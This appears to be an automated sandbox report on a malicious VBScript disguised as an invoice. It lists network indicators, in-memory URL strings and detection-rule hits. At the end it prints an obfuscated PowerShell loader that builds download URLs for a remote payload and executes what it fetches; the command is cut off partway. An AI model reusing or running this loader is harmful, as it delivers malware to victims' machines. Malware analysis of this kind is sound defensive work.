Source: Submited Sample |
Integrated Neural Analysis Model: Matched 99.3% probability |
Source: unknown |
HTTPS traffic detected: 185.221.216.115:443 -> 192.168.2.5:49705 version: TLS 1.2 |
Source: |
Binary string: tem.Core.pdbo source: powershell.exe, 00000007.00000002.3329236621.0000000007A2D000.00000004.00000020.00020000.00000000.sdmp |
Source: |
Binary string: em.Core.pdb source: powershell.exe, 00000007.00000002.3329236621.0000000007A2D000.00000004.00000020.00020000.00000000.sdmp |
Source: |
Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Core\v4.0_4.0.0.0__b77a5c561934e089\System.Core.pdb source: powershell.exe, 00000007.00000002.3329236621.0000000007A2D000.00000004.00000020.00020000.00000000.sdmp |
Source: C:\Windows\System32\wscript.exe |
Child: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Source: Joe Sandbox View |
IP Address: 185.221.216.115 185.221.216.115 |
Source: Joe Sandbox View |
IP Address: 185.221.216.115 185.221.216.115 |
Source: Joe Sandbox View |
JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e |
Source: global traffic |
HTTP traffic detected: GET /wp-includes/img/Appliances.smi HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: adjuntia.ru.comConnection: Keep-Alive |
Source: unknown |
UDP traffic detected without corresponding DNS query: 1.1.1.1 |
Source: global traffic |
HTTP traffic detected: GET /wp-includes/img/Appliances.smi HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: adjuntia.ru.comConnection: Keep-Alive |
Source: global traffic |
DNS traffic detected: DNS query: adjuntia.ru.com |
Source: powershell.exe, 00000003.00000002.3317936149.00000266C0F9F000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: http://adjuntia.ru.com |
Source: powershell.exe, 00000003.00000002.3438249100.00000266D77E0000.00000004.00000020.00020000.00000000.sdmp |
String found in binary or memory: http://crl.m |
Source: powershell.exe, 00000007.00000002.3329236621.0000000007A0E000.00000004.00000020.00020000.00000000.sdmp |
String found in binary or memory: http://crl.microsoft |
Source: wscript.exe, 00000000.00000003.2135299220.0000021ADBB5D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.2136309922.0000021ADBB75000.00000004.00000020.00020000.00000000.sdmp |
String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en |
Source: wscript.exe, 00000000.00000003.2135299220.0000021ADBB5D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.2136309922.0000021ADBB75000.00000004.00000020.00020000.00000000.sdmp, 77EC63BDA74BD0D0E0426DC8F80085060.0.dr |
String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab |
Source: wscript.exe, 00000000.00000003.2032932781.0000021ADDAF4000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2033119338.0000021ADDB1B000.00000004.00000020.00020000.00000000.sdmp |
String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab?e6270429c06a4 |
Source: wscript.exe, 00000000.00000003.2135299220.0000021ADBB5D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.2136309922.0000021ADBB75000.00000004.00000020.00020000.00000000.sdmp |
String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cabme |
Source: wscript.exe, 00000000.00000003.2033161555.0000021ADDAD1000.00000004.00000020.00020000.00000000.sdmp |
String found in binary or memory: http://ctldl.windowsupdate.com:80/msdownload/update/v3/static/trustedr/en/authrootstl.cab?e6270429c0 |
Source: powershell.exe, 00000003.00000002.3408756335.00000266CF20D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.3322827054.0000000005E85000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: http://nuget.org/NuGet.exe |
Source: powershell.exe, 00000007.00000002.3317433390.0000000004F78000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: http://pesterbdd.com/images/Pester.png |
Source: powershell.exe, 00000003.00000002.3317936149.00000266BF1A1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.3317433390.0000000004E21000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name |
Source: powershell.exe, 00000007.00000002.3317433390.0000000004F78000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html |
Source: powershell.exe, 00000003.00000002.3317936149.00000266BF5E6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.3317936149.00000266C0C44000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://adjuntia.ru.com |
Source: powershell.exe, 00000003.00000002.3317936149.00000266C0A68000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.3317936149.00000266BF3C8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.3317433390.0000000004F78000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://adjuntia.ru.com/wp-includes/img/Appliances.smi |
Source: powershell.exe, 00000003.00000002.3317936149.00000266BF1A1000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://aka.ms/pscore68 |
Source: powershell.exe, 00000007.00000002.3317433390.0000000004E21000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://aka.ms/pscore6lB |
Source: powershell.exe, 00000003.00000002.3317936149.00000266C0A68000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.3317936149.00000266BF3C8000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://ambyverce.com/Appliances.smi |
Source: powershell.exe, 00000007.00000002.3317433390.0000000004F78000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://ambyverce.com/Appliances.smid |
Source: powershell.exe, 00000007.00000002.3322827054.0000000005E85000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://contoso.com/ |
Source: powershell.exe, 00000007.00000002.3322827054.0000000005E85000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://contoso.com/Icon |
Source: powershell.exe, 00000007.00000002.3322827054.0000000005E85000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://contoso.com/License |
Source: powershell.exe, 00000007.00000002.3317433390.0000000004F78000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://github.com/Pester/Pester |
Source: powershell.exe, 00000003.00000002.3317936149.00000266C0605000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://go.micro |
Source: powershell.exe, 00000003.00000002.3408756335.00000266CF20D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.3322827054.0000000005E85000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://nuget.org/nuget.exe |
Source: unknown |
Network traffic detected: HTTP traffic on port 49705 -> 443 |
Source: unknown |
Network traffic detected: HTTP traffic on port 443 -> 49705 |
Source: unknown |
HTTPS traffic detected: 185.221.216.115:443 -> 192.168.2.5:49705 version: TLS 1.2 |
Source: amsi32_5572.amsi.csv, type: OTHER |
Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen |
Source: Process Memory Space: powershell.exe PID: 1600, type: MEMORYSTR |
Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen |
Source: Process Memory Space: powershell.exe PID: 5572, type: MEMORYSTR |
Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen |
Source: INVOICE_DF76K.vbs |
Static file information: Suspicious name |
Source: C:\Windows\System32\wscript.exe |
Process created: Commandline size = 6705 |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process created: Commandline size = 6705 |
|
Source: C:\Windows\System32\wscript.exe |
Process created: Commandline size = 6705 |
Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process created: Commandline size = 6705 |
Jump to behavior |
Source: C:\Windows\System32\wscript.exe |
WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::EnumKey |
Source: C:\Windows\System32\wscript.exe |
WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::EnumKey |
Source: C:\Windows\System32\wscript.exe |
WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::EnumKey |
Source: C:\Windows\System32\wscript.exe |
WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::EnumKey |
Source: C:\Windows\System32\wscript.exe |
WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::EnumKey |
Source: C:\Windows\System32\wscript.exe |
WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::EnumKey |
Source: C:\Windows\System32\wscript.exe |
WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::EnumKey |
Source: C:\Windows\System32\wscript.exe |
WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::EnumKey |
Source: C:\Windows\System32\wscript.exe |
WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::EnumKey |
Source: C:\Windows\System32\wscript.exe |
WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::EnumKey |
Source: C:\Windows\System32\wscript.exe |
WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::EnumKey |
Source: C:\Windows\System32\wscript.exe |
WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::EnumKey |
Source: C:\Windows\System32\wscript.exe |
WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::EnumKey |
Source: C:\Windows\System32\wscript.exe |
WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::EnumKey |
Source: C:\Windows\System32\wscript.exe |
WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::EnumKey |
Source: C:\Windows\System32\wscript.exe |
WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::EnumKey |
Source: C:\Windows\System32\wscript.exe |
WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::EnumKey |
Source: C:\Windows\System32\wscript.exe |
Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "If (${host}.CurrentUICulture) {$Afrikaans='SUBsTR';$Semiprofanity26++;}$Afrikaans+='ing';Function konstruktive($Metaludlser){$Arbejdernederlaget=$Metaludlser.Length-$Semiprofanity26;For( $Outlimn=4;$Outlimn -lt $Arbejdernederlaget;$Outlimn+=5){$junking+=$Metaludlser.$Afrikaans.'Invoke'( $Outlimn, $Semiprofanity26);}$junking;}function Kreditorselskabs($Programeksempler){ . ($Ecumenicalism) ($Programeksempler);}$blyindholds=konstruktive 'AtlaMimmooDiamz eneiAabelQuitlCasuaAu,i/ res5,uma.Seas0Uroc con(CuriW eveiEmainSu idFiskoTelewS,odsPeng MedlN ,umTGale Bomb1Cone0c.ff.Adj 0Incu;pa.t Is,eWByggi.ndfnEffe6rel.4 sp,;B.tt ,uggxGome6Ency4 Unc;Fuci Unhar Appv nch: uja1Semi2Dayf1Opri.Solu0Awni)tr.l EtikGungieHeavcSmukkEnfooTors/Skjo2Tppe0Hall1 Bio0Glid0Batt1gast0Sa,g1Osmi Do FSuggiOplyr SkrePachf AndoBavixresc/ Mlk1for 2Sort1Vris.Skum0Shel ';$Begazes=konstruktive 'Pr.sUA resEc ieS unrE.tl-SvamATevagPlo eF,ern .uvtFu d ';$Ideogrammerne=konstruktive ' S,ahOvert InatUdjvpRestsByst:Fin /Fer,/Ma,taDiffdHugojNonruSew,nLytetMeloi EftaStre.MustrDi.kuMu,i.For,cGil.oToilmS ur/P.rtwNedspUnob-GonaiSnornKlimc FodlStyruspard ,coeCystsSnek/Ga giSolam IntgB,op/,utsARetspTrempBroolOmbyiO.spa Ln.nHum.c Ge eHomesBlod.MakrsPe,rmBeskiGeni>Nat,hDe itDecatBolspDeessspol:,upe/Inco/UnmoaL,esmRuddbMe ny Penv OnoespadrSnd cTraneGr.n.Bac,cforloForsm med/AuteAShempJawfpFoehl C.ri Fe,asyrln QuicAnsteA.iosBich.PennsPaabm Doli or ';$Toddyskes=konstruktive 'A,um> Tra ';$Ecumenicalism=konstruktive 'e asiK.lleDomix ilr ';$Drsprkkernes='Nonnutritiousness';$Telemestre = konstruktive 'Opsae Ovec inrhl,tco Se, Con%Om raD.umpsvvepAfstdHuipa RattHermaCel.% opn\BogbSDiskpFrili BlisOad eK.llf Sneiinv skok,kUret.PrecP ,anuHarlr erb Fejl&Ta p&Hege Ky.ieNonec VedhI.veoU,de Prot Li. ';Kreditorselskabs (konstruktive 'Inde$ContgMa clUdeloregabRoseaAmbrl Gra:.iroaKalinLetvfMemblDigiyCituvKlapnAmniiGtefnFla,gVand=Genn(TurtcBlommOctadSym, B eb/BicecAnni Un.e$NiteT Rh.eTea.lB.dre Betm O.veFortsSviptOrdlr An.eDr n)Unsl ');Kreditorselskabs (konstruktive 'Blan$Ferrg,uthlU.saoJejub,nigaC.rnlFind:ResoVS nnec,annTriqaVingl,inenNoneeCouns orfsSkif=Apos$PostI ,aadRen,eSummoBarngPilar BanaDe.emA,famFoure Skyr Syln SoaeMult. G,asBrdrpOmarlIn.oi UdbtRadi(Sten$NapkTFjero ,ysdmambdOverySacesPcflkLivieAktusAnt.)Strb ');Kreditorselskabs (konstruktiv |